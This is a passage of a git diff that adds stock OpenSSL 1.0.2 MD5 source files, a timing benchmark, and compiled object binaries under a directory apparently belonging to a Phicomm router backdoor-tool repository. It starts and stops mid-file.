+        R0(B, C, D, A, X(3), 22, 0xc1bdceeeL);
+        HOST_c2l(data, l);
+        X(5) = l;
+        R0(A, B, C, D, X(4), 7, 0xf57c0fafL);
+        HOST_c2l(data, l);
+        X(6) = l;
+        R0(D, A, B, C, X(5), 12, 0x4787c62aL);
+        HOST_c2l(data, l);
+        X(7) = l;
+        R0(C, D, A, B, X(6), 17, 0xa8304613L);
+        HOST_c2l(data, l);
+        X(8) = l;
+        R0(B, C, D, A, X(7), 22, 0xfd469501L);
+        HOST_c2l(data, l);
+        X(9) = l;
+        R0(A, B, C, D, X(8), 7, 0x698098d8L);
+        HOST_c2l(data, l);
+        X(10) = l;
+        R0(D, A, B, C, X(9), 12, 0x8b44f7afL);
+        HOST_c2l(data, l);
+        X(11) = l;
+        R0(C, D, A, B, X(10), 17, 0xffff5bb1L);
+        HOST_c2l(data, l);
+        X(12) = l;
+        R0(B, C, D, A, X(11), 22, 0x895cd7beL);
+        HOST_c2l(data, l);
+        X(13) = l;
+        R0(A, B, C, D, X(12), 7, 0x6b901122L);
+        HOST_c2l(data, l);
+        X(14) = l;
+        R0(D, A, B, C, X(13), 12, 0xfd987193L);
+        HOST_c2l(data, l);
+        X(15) = l;
+        R0(C, D, A, B, X(14), 17, 0xa679438eL);
+        R0(B, C, D, A, X(15), 22, 0x49b40821L);
+        /* Round 1 */
+        R1(A, B, C, D, X(1), 5, 0xf61e2562L);
+        R1(D, A, B, C, X(6), 9, 0xc040b340L);
+        R1(C, D, A, B, X(11), 14, 0x265e5a51L);
+        R1(B, C, D, A, X(0), 20, 0xe9b6c7aaL);
+        R1(A, B, C, D, X(5), 5, 0xd62f105dL);
+        R1(D, A, B, C, X(10), 9, 0x02441453L);
+        R1(C, D, A, B, X(15), 14, 0xd8a1e681L);
+        R1(B, C, D, A, X(4), 20, 0xe7d3fbc8L);
+        R1(A, B, C, D, X(9), 5, 0x21e1cde6L);
+        R1(D, A, B, C, X(14), 9, 0xc33707d6L);
+        R1(C, D, A, B, X(3), 14, 0xf4d50d87L);
+        R1(B, C, D, A, X(8), 20, 0x455a14edL);
+        R1(A, B, C, D, X(13), 5, 0xa9e3e905L);
+        R1(D, A, B, C, X(2), 9, 0xfcefa3f8L);
+        R1(C, D, A, B, X(7), 14, 0x676f02d9L);
+        R1(B, C, D, A, X(12), 20, 0x8d2a4c8aL);
+        /* Round 2 */
+        R2(A, B, C, D, X(5), 4, 0xfffa3942L);
+        R2(D, A, B, C, X(8), 11, 0x8771f681L);
+        R2(C, D, A, B, X(11), 16, 0x6d9d6122L);
+        R2(B, C, D, A, X(14), 23, 0xfde5380cL);
+        R2(A, B, C, D, X(1), 4, 0xa4beea44L);
+        R2(D, A, B, C, X(4), 11, 0x4bdecfa9L);
+        R2(C, D, A, B, X(7), 16, 0xf6bb4b60L);
+        R2(B, C, D, A, X(10), 23, 0xbebfbc70L);
+        R2(A, B, C, D, X(13), 4, 0x289b7ec6L);
+        R2(D, A, B, C, X(0), 11, 0xeaa127faL);
+        R2(C, D, A, B, X(3), 16, 0xd4ef3085L);
+        R2(B, C, D, A, X(6), 23, 0x04881d05L);
+        R2(A, B, C, D, X(9), 4, 0xd9d4d039L);
+        R2(D, A, B, C, X(12), 11, 0xe6db99e5L);
+        R2(C, D, A, B, X(15), 16, 0x1fa27cf8L);
+        R2(B, C, D, A, X(2), 23, 0xc4ac5665L);
+        /* Round 3 */
+        R3(A, B, C, D, X(0), 6, 0xf4292244L);
+        R3(D, A, B, C, X(7), 10, 0x432aff97L);
+        R3(C, D, A, B, X(14), 15, 0xab9423a7L);
+        R3(B, C, D, A, X(5), 21, 0xfc93a039L);
+        R3(A, B, C, D, X(12), 6, 0x655b59c3L);
+        R3(D, A, B, C, X(3), 10, 0x8f0ccc92L);
+        R3(C, D, A, B, X(10), 15, 0xffeff47dL);
+        R3(B, C, D, A, X(1), 21, 0x85845dd1L);
+        R3(A, B, C, D, X(8), 6, 0x6fa87e4fL);
+        R3(D, A, B, C, X(15), 10, 0xfe2ce6e0L);
+        R3(C, D, A, B, X(6), 15, 0xa3014314L);
+        R3(B, C, D, A, X(13), 21, 0x4e0811a1L);
+        R3(A, B, C, D, X(4), 6, 0xf7537e82L);
+        R3(D, A, B, C, X(11), 10, 0xbd3af235L);
+        R3(C, D, A, B, X(2), 15, 0x2ad7d2bbL);
+        R3(B, C, D, A, X(9), 21, 0xeb86d391L);
+
+        A = c->A += A;
+        B = c->B += B;
+        C = c->C += C;
+        D = c->D += D;
+    }
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5_dgst.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5_dgst.o
new file mode 100644
index 0000000000000000000000000000000000000000..efb1a38b046455bbb54bdd530be939409855d09c
GIT binary patch
literal 4632
zcmbtW4{#LK8Q;xak~?y24oTZ<{nI-=Z9?&yrBH!!G%vT8Z0c!52%<nR!0|`TACm*I
zW2u?|zHU}+rBgbcPHSZ>YG<5Ioffp(-HRocfbAWi1Y|6oVg#jy7HcSi*Wb6d8^R^d
zblNv__uhW*eed`Ce&6@r?ssDGx*|~&oF)o42^XIns~~KXE{<!gVT~XOlZ7+oSDjP!
z2mLBPCmXw_Vn*d7XI@lyir2(e^B3PdrSc+m=ch+r*|vVc46Lg4?4<4c$WPHqwR#V`
zlP%O5eXNNsXqvC`1>w`$oo+Q351&@M9}b_+mG}I#R1g?973~{Zvzy5ST3dypwOzqN
zSw-6zR<u>K`I7JfnrQYYTJw$d`c`Sf_InR9o{fnq%ndQw)M$yBDrMq6z4wa?f7^dt
zYxc!L*%;4Y7K@Hx#Sjw*c$S%_Pm!~FPvD)7U|4Go#Kf!;8i>hhEITG=MN_Nun*-$v
z7AxVSni4+3LTSCH=<k1g&5X$zCK|9EWoCL3)3+AARQ~Y46rN^cT23n=Ly^-ly|-%G
z?k)9Vh7X!XsUoKo(FmpFK}8%?z;0??^$vxbT654$`DD|I;W(m|O+eP`y_Mn*>Mk&D
zfCG~=VixF3HezBL&ViwAkF4bxt+|r$Wr79klUnn1V9Obd&mz#1ikPm`d*{A1qG)_j
z(H4ZyPDJEai*q@PNVQF53<>}12bXY=P_%_J^F-9{-8BVduAcJLeGu4TVo}ILU-t9^
z+b)a`AEZK0L?3z%sN*36A<xSV6UME@DZ9{HByq*%*IxB8Pb;z!%0P4Ig85^nQ4E<e
zJ*DQ?HHN}daw;@vX%7M75Fq6hQ<(P7ySw>1Zpz5H=_p?ELjP}0FrG0@2@yiokOAfM
ziWe{Sf9-AL*G&5We<|q6i=gu>l%h*O0af<s@H0acDUdJX5u2kH5^^o3KiU62kjH|;
zvvl~)zl0_L#Z<-Hr8o2eDGz;VkVi&?+%oyCkH!W`pvP^{9`SD#cgJviaHd$uWHQc?
z8AE{=pZM$Z1Ui672T;g)c~JsNc*uf-`aS-$&z?H3@IgXmdhg^zMeVB<s_hh|jzT5r
zLR5cc-;GbxQMw9`htE@`;_Mj`6Ei4v#tB>RDXyJ!E(Z#Vi`D=dToic#hfpEHZU8>|
z@dH~BFb)TB<UuioDWtQkR__t6Zuv=TjHksx2nacSzS-|x06xwr1!DMV2sp#8k^^Si
zOEsW;@cMS1MZJKDRRnfY+&Ixwp8wOkx5T(9LK(9j4DY$+)sIOkG0Ri9Jj&!jOCAcD
zq&aD({0vk&e)s#=8Ol-|#8r~#0Q02X8-HA>AXp&FSx}VDedU=C@*0RHm7Lq6XO33#
z5z{Cm8k?$59UvOmYXD3Dk8^ws1pKwQc8afj+zm8FEDhwLd`{-TAp*v&lhS)!@BQeV
zVZwxDRL61(cMl&hQ*L67pmEJb^`5e`5C8nj06|p90o6XjB<Y6;rw&mi7XI=Ll&3fV
zenb%`tmpH})m0ziaHqW^`yi|r8<H59nf$}tw5WwsGD5-nesRs#7sZq}OClrZhG|Y>
zBXp;ENh14%&H35W=jj?T%13~dR=h@D483=1-(8Cnd=OXK5i?yzXa=F77U(7|`~F_v
zlXQXM#xqkubdUy6e6DYQbSei#OdgmB)s<b^vk5oplJN0SWPR(@#*I7LVLRrKK%D}a
zjZm>LFYbRz1kzJ>ba?uwz-GJ;QURNd?1yxUcK|DJmY$j7xlPO>Q?81r_$&yZe3^F-
zQWlf<KmsQ2$01^7U-`&BChk$ZhwaKfY7Uku;$alG=dq3RN0>JglkwuBcg|T5ErEU3
zKj*%t@Iy#7XnCz%Qpx~=xC5{5J2;JJAoobdOZOErgp&Wl_x5l8kWP`Slyu&w@KVZL
z{-vZfy1^a5u6mEF(Fb*Ty@%iF=8e7+x1Y`B7B6K>*izQamRWChb<@7`p7-&d$6K9e
zboX2I#eny_$}iv*zki;q-rwcQ)mNzeFpv3F^MfnJrV6cT5&V*C;(8(w*QZZy(A^bk
z_a`?$Sklma;pX+VyK1nB%KO!->?`yQab~;9@p*A3&WDfV5mWE(@}rlHIDfxEUuyKn
z7LgraBiLpA+z$cQuku4@wku+6(T6u#)+$i2wwW0QjS_pKAyvb3_fbO?cdJ!>>ZW&+
z<$UQPwfheNY=HG=w%=`i$K>PgyZB9GF*|Y9NG?ZTIBY>&Ulp*z);2Bz*WJoZfk)I_
zzuKLfz5dz;z2ZhIDxy5BR{dM$2lJu5pz=RkT;!a!Xto{KaKRc?i{hgydV78?1#U^u
zAGIUbTs$UdQ8$mdwWx>3JX+MZn8$n;VdSjuR%KSOqop$$Y+n^@>`1iDpC1p(k?P2d
z;EWl;Z??1rXH?6x1ff0}og1udTE4C=xh^;-^7Tmd_3{nttVem{jOs}B%&NSZ1gGZ4
zkCIW0U;S-OLXjXCWOLz1ts>tE;<xS)#0`G&a$l+EDP)y=uCV7QXlgb1Rnq|NFunza
zxa5Dbs8$L*;fhH?-CZkH_7*d#dUFYrW_Opmc9lxiOscGvf>={4`D-PQa3kE3v;o>V
z`fHT@dQn^o^tzZ7-0W7Q%I;!CsxEp%s;rZO%yDFWyZ63{<;3e{@<Vezg)1>mTNXih
zj`}*u-&+)u0-Ifm6zp~vX;Ppe4{xs;-%%mEg@5G6&yZF$JHEL_RlIc0WvPCtjh<Xq
z7ACTjnB$vE@QgRY;u5@{VJ{hH_rY@682(N!KWE#WXDgquO|$Kn+0a&wU_<R$`}k~V
zNBgL4|B`LD^oQ+M{HBbF_c}aVt##$BWh+;AB_k^Y)cmrBwzWxtY|HO&Uvb~El`YAZ
zW$m3S6P?y<QwIzQYq+4ZrLAjKduOZlRJXRR<$i0lKGE5=w!O{Sev8eUYP<};^SOM>
ze1?6A&AV{@<DX#<+CVr*be2ZjOnc<m9bGpR*d1MW7T6tK_ZHY4U4=;3L#@e{<>-^0
z`F@Qv>P+0<5=kaDB!vj+Cq$NabqSHq_WZ+&_SV)!8|K>DlZgoKfa|-GEi3M`pI5i7
zi*$6hcO*KK55b3aN~~G7s<WjvVKe#vx**)?^b}TR4Q$j5Tj%^!eyua6{&M^%H#PW;
zZR+Iw(>=D4a!okSi3!+tsynhf_nmDPgh`{LO9q7}eL7}o&;Qk5hA-_owpQ>sia&ZT
zETbR<?cV9;U_k!Pz3bSov-yA3G1$Gs-|1^%cgACv&igOpzXMKmI~DR@WcvrlZi=y^
zzhk}^1Hv!#-(dTnb{5)wp+8mOMET!g=ifPBlz%EE$KT2SMA!tih8)lyvBjZ#k|-7W
k)1KpU58H8aK)Wm7js6#EJq0rp`3LO_)Oi;=8x;Eg2PUZQ@&Et;

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5_locl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5_locl.h
new file mode 100644
index 0000000..82e6921
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5_locl.h
@@ -0,0 +1,133 @@
+/* crypto/md5/md5_locl.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdlib.h>
+#include <string.h>
+#include <openssl/e_os2.h>
+#include <openssl/md5.h>
+
+#ifndef MD5_LONG_LOG2
+# define MD5_LONG_LOG2 2        /* default to 32 bits */
+#endif
+
+#ifdef MD5_ASM
+# if defined(__i386) || defined(__i386__) || defined(_M_IX86) || defined(__INTEL__) || \
+     defined(__x86_64) || defined(__x86_64__) || defined(_M_AMD64) || defined(_M_X64)
+#  define md5_block_data_order md5_block_asm_data_order
+# elif defined(__ia64) || defined(__ia64__) || defined(_M_IA64)
+#  define md5_block_data_order md5_block_asm_data_order
+# elif defined(__sparc) || defined(__sparc__)
+#  define md5_block_data_order md5_block_asm_data_order
+# endif
+#endif
+
+void md5_block_data_order(MD5_CTX *c, const void *p, size_t num);
+
+#define DATA_ORDER_IS_LITTLE_ENDIAN
+
+#define HASH_LONG               MD5_LONG
+#define HASH_CTX                MD5_CTX
+#define HASH_CBLOCK             MD5_CBLOCK
+#define HASH_UPDATE             MD5_Update
+#define HASH_TRANSFORM          MD5_Transform
+#define HASH_FINAL              MD5_Final
+#define HASH_MAKE_STRING(c,s)   do {    \
+        unsigned long ll;               \
+        ll=(c)->A; (void)HOST_l2c(ll,(s));      \
+        ll=(c)->B; (void)HOST_l2c(ll,(s));      \
+        ll=(c)->C; (void)HOST_l2c(ll,(s));      \
+        ll=(c)->D; (void)HOST_l2c(ll,(s));      \
+        } while (0)
+#define HASH_BLOCK_DATA_ORDER   md5_block_data_order
+
+#include "md32_common.h"
+
+/*-
+#define F(x,y,z)        (((x) & (y))  |  ((~(x)) & (z)))
+#define G(x,y,z)        (((x) & (z))  |  ((y) & (~(z))))
+*/
+
+/*
+ * As pointed out by Wei Dai <weidai@eskimo.com>, the above can be simplified
+ * to the code below.  Wei attributes these optimizations to Peter Gutmann's
+ * SHS code, and he attributes it to Rich Schroeppel.
+ */
+#define F(b,c,d)        ((((c) ^ (d)) & (b)) ^ (d))
+#define G(b,c,d)        ((((b) ^ (c)) & (d)) ^ (c))
+#define H(b,c,d)        ((b) ^ (c) ^ (d))
+#define I(b,c,d)        (((~(d)) | (b)) ^ (c))
+
+#define R0(a,b,c,d,k,s,t) { \
+        a+=((k)+(t)+F((b),(c),(d))); \
+        a=ROTATE(a,s); \
+        a+=b; };\
+
+#define R1(a,b,c,d,k,s,t) { \
+        a+=((k)+(t)+G((b),(c),(d))); \
+        a=ROTATE(a,s); \
+        a+=b; };
+
+#define R2(a,b,c,d,k,s,t) { \
+        a+=((k)+(t)+H((b),(c),(d))); \
+        a=ROTATE(a,s); \
+        a+=b; };
+
+#define R3(a,b,c,d,k,s,t) { \
+        a+=((k)+(t)+I((b),(c),(d))); \
+        a=ROTATE(a,s); \
+        a+=b; };
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5_one.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5_one.c
new file mode 100644
index 0000000..4ac882e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5_one.c
@@ -0,0 +1,96 @@
+/* crypto/md5/md5_one.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <openssl/md5.h>
+#include <openssl/crypto.h>
+
+#ifdef CHARSET_EBCDIC
+# include <openssl/ebcdic.h>
+#endif
+
+unsigned char *MD5(const unsigned char *d, size_t n, unsigned char *md)
+{
+    MD5_CTX c;
+    static unsigned char m[MD5_DIGEST_LENGTH];
+
+    if (md == NULL)
+        md = m;
+    if (!MD5_Init(&c))
+        return NULL;
+#ifndef CHARSET_EBCDIC
+    MD5_Update(&c, d, n);
+#else
+    {
+        char temp[1024];
+        unsigned long chunk;
+
+        while (n > 0) {
+            chunk = (n > sizeof(temp)) ? sizeof(temp) : n;
+            ebcdic2ascii(temp, d, chunk);
+            MD5_Update(&c, temp, chunk);
+            n -= chunk;
+            d += chunk;
+        }
+    }
+#endif
+    MD5_Final(md, &c);
+    OPENSSL_cleanse(&c, sizeof(c)); /* security consideration */
+    return (md);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5_one.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5_one.o
new file mode 100644
index 0000000000000000000000000000000000000000..a3c80d76d392e503fd49492e149d74b9a9642ff7
GIT binary patch
literal 2024
zcmbu9PiqrV5WwGNQ(JAija8&jkv+5$(Jo12QHx48P1235Mr<P@t;;6aHl_Jfk`1ID
z6e$&#TIs=qM~{9ADd;DVet;eX1*M{b2T|(G?tAHGNlp$7GxK{h^WMHc`#7nld>luZ
zaO65Uj2I>4jsMV(*=~#skO28Pc;>f!H*NirvuW$EJg07r;b>M_|Jp1loBpv7M2eLd
zEk<^fjSnWDwsw`R(r7@jzJ12bjU6+jT0c~4pAp5{SFKO>;M;k-+R6OFCnFz~O=wk6
zqE2J8$4*n$-#1ljZ$X}y7vu-;ux(3brl+UGP&U`7m<{oY6qUl`kxLCbj69kMOW}*>
z9PCu!X9hugKxb}ciI0#SWIQO!NyiZG;T^&?gWO1<w{IIZ>?-inbnGSCln{L3OA5nV
zd{Pjf`xPPdv?n3F=6q!#ln}(YFdP?xaiNdabTfDse)9dG(>UMpq;Rclwe3|rbn;3+
z0M5nn+nMm>2y@#kPkP&87VxC=*YNgkvMk3Aff;hG-`+D|r$F6naIy)x(1lNS;ju3K
zMi+j+3n%5mq*kpMQl6Bh=tML^ZYCy)Hlt?ZvZ`fLsoCV5HYdl`q=q9}y0UEAPIk4R
zn}+SCmMeORWNs&K&CaS?zGUc?x<NFpZtD3JEni&G7WL&4ECA$$WANVDr}F2(k!zIW
z2?jtJ&$#%2i{tm8V7>s#@|O^TARh!}{0Tx3<hcKgi{PW+dQe*;)z`|Vo+DD-tU0#G
zyqZzcCDUk{M1nogiIl6?iIlIF%SHuQrD_@yysdHj`)RyXX-KQJ>Z(yQ*N9|yFpAn@
zO)nd*DgVb2p%~wi_eRHnp|JbsL{2XA(T;%P-o!xNvQ3}bHigH);ymmn3{!rVa_`IB
zrQ=?MJ=}u#AA5T1_h^#$&3NMo<YCV+&1YthI_DXnmd(%X6maIdQ~Nu?4!QX5@UPK!
zhae8pdJ%lLu>E5!2M(rs>%+AE9!sRwTfYFj)A@-ALD)Ir`C%=qXS~zgSoe(1|B71t
opRyh}&gzeX?>##l7b#r9z$LU@iyQ~9Q~hPSe){`p<$LS@0iwg!jQ{`u

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5s.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5s.cpp
new file mode 100644
index 0000000..dd343fd
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5s.cpp
@@ -0,0 +1,78 @@
+//
+// gettsc.inl
+//
+// gives access to the Pentium's (secret) cycle counter
+//
+// This software was written by Leonard Janke (janke@unixg.ubc.ca)
+// in 1996-7 and is entered, by him, into the public domain.
+
+#if defined(__WATCOMC__)
+void GetTSC(unsigned long&);
+#pragma aux GetTSC = 0x0f 0x31 "mov [edi], eax" parm [edi] modify [edx eax];
+#elif defined(__GNUC__)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  asm volatile(".byte 15, 49\n\t"
+	       : "=eax" (tsc)
+	       :
+	       : "%edx", "%eax");
+}
+#elif defined(_MSC_VER)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  unsigned long a;
+  __asm _emit 0fh
+  __asm _emit 31h
+  __asm mov a, eax;
+  tsc=a;
+}
+#endif      
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/md5.h>
+
+extern "C" {
+void md5_block_x86(MD5_CTX *ctx, unsigned char *buffer,int num);
+}
+
+void main(int argc,char *argv[])
+	{
+	unsigned char buffer[64*256];
+	MD5_CTX ctx;
+	unsigned long s1,s2,e1,e2;
+	unsigned char k[16];
+	unsigned long data[2];
+	unsigned char iv[8];
+	int i,num=0,numm;
+	int j=0;
+
+	if (argc >= 2)
+		num=atoi(argv[1]);
+
+	if (num == 0) num=16;
+	if (num > 250) num=16;
+	numm=num+2;
+	num*=64;
+	numm*=64;
+
+	for (j=0; j<6; j++)
+		{
+		for (i=0; i<10; i++) /**/
+			{
+			md5_block_x86(&ctx,buffer,numm);
+			GetTSC(s1);
+			md5_block_x86(&ctx,buffer,numm);
+			GetTSC(e1);
+			GetTSC(s2);
+			md5_block_x86(&ctx,buffer,num);
+			GetTSC(e2);
+			md5_block_x86(&ctx,buffer,num);
+			}
+		printf("md5 (%d bytes) %d %d (%.2f)\n",num,
+			e1-s1,e2-s2,(double)((e1-s1)-(e2-s2))/2);
+		}
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5test.c
new file mode 100644
index 0000000..0d0ab2d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/md5test.c
@@ -0,0 +1,138 @@
+/* crypto/md5/md5test.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+#include "../e_os.h"
+
+#ifdef OPENSSL_NO_MD5
